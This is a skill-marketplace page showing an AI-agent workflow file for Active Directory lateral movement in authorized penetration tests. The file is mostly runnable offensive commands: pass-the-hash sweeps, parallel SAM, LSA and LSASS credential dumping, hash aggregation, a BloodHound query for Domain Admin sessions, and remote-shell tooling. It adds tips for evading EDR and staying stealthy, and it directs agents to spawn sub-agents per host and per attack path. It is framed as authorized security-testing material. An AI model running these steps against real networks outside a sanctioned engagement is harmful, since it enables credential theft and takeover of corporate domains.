All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

workflowslateral_movement.md

≈917 tokens on demand. Your agent reads this file only when SKILL.md points to it.

Workflow: Lateral Movement

Given at least one valid credential (cleartext / NT hash / TGT) plus local admin on one host, expand horizontally to collect more hashes, find DA sessions, and reach objectives.

Full technique reference: references/lateral_movement.md.

Preconditions

  • Credential material + at least one host where it is local admin (nxc ... (Pwn3d!))
  • BloodHound data showing owned principal's AdminTo edges

Inputs

  • HOST, USER, PASS or HASH (NT) or TGT (.ccache)
  • Target list: wins.txt (Windows hosts from recon)

Step sequence

1. Sweep for where the cred is local admin

nxc smb wins.txt -u "$USER" -H ":$HASH" --local-auth \
  | tee sweep.log
grep '(Pwn3d!)' sweep.log | awk '{print $2}' > pwned_hosts.txt

2. For each owned host, pull secrets (parallelizable — one sub-agent per host)

while read -r h; do
  ( nxc smb "$h" -u "$USER" -H ":$HASH" --local-auth \
      --sam --lsa -M lsassy > "loot/${h}.txt" ) &
done < pwned_hosts.txt
wait

Aggregate unique hashes:

grep -h 'NTLM:' loot/*.txt | awk -F: '{print $1":"$4}' | sort -u > all_hashes.txt

3. Find DA sessions on owned hosts (reasoning hint: cross-ref BH)

// In BloodHound
MATCH (c:Computer {owned:true})-[:HasSession]->(u:User)-[:MemberOf*1..]->
      (:Group {name:"DOMAIN ADMINS@CORP.LOCAL"})
RETURN c.name, u.name

If a DA session is present on any owned host, pivot to that host and dump LSASS. This is the simplest path to DA.

4. Choose execution method per pivot

Goal Method Command
Quiet recon WMI wmiexec.py user@h
Interactive SYSTEM shell PsExec (noisy) psexec.py user@h
WinRM-managed host Evil-WinRM evil-winrm -i h -u user -H HASH
DCOM / no service event dcomexec dcomexec.py -object MMC20 user@h
Single command atexec atexec.py user@h "whoami"

5. Sub-agent fan-out for multi-path exploration

If BloodHound surfaces N distinct attack paths of similar length, delegate one sub-agent per path. Each path has its own working directory and credential cache; they share the BH graph read-only.

Example path assignment:

  • Sub-agent A: Kerberoast svc_sql -> RDP to SQL01 -> DPAPI -> DA cred
  • Sub-agent B: ACL GenericAll -> AddMember to "Backup Operators" -> NTDS.dit read
  • Sub-agent C: RBCD via MAQ -> S4U impersonate DA -> PSExec on DC

Collate findings back to a single engagement-notes.md.

6. Ticket / pivot hygiene

# Windows
klist purge
klist purge -li 0x3e7          # SYSTEM's cache

# Linux
kdestroy -A

Keep an inventory of every host touched (hostname, cred used, method, timestamp) in engagement-notes.md for the cleanup phase.

Parallelism summary

Step Parallel?
PtH sweep across hosts Yes
Per-host secret dump Yes (one sub-agent per host)
Same-host LSASS dumps NO — repeated dumps trigger EDR
Multi-path BH attack exploration Yes (one sub-agent per path)

Safety hints

  • PsExec leaves Windows Event 7045 + SMB PSEXESVC artefacts. For stealth engagements, default to WMI or DCOM.
  • Avoid stacking two mimikatz invocations on the same host — the second is near-guaranteed EDR trigger.
  • Do not leave uploaded PE files on hosts. Either use memory-resident approaches (Invoke-* PowerShell) or clean up with del /F.
  • Every new cred obtained should be verified against scope — e.g. a captured cert for CORP-PARTNER\admin may be out of scope.

Next workflows

  • DA creds in hand: workflows/domain_dominance.md
  • Need more privs on a specific host: workflows/privilege_escalation.md

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest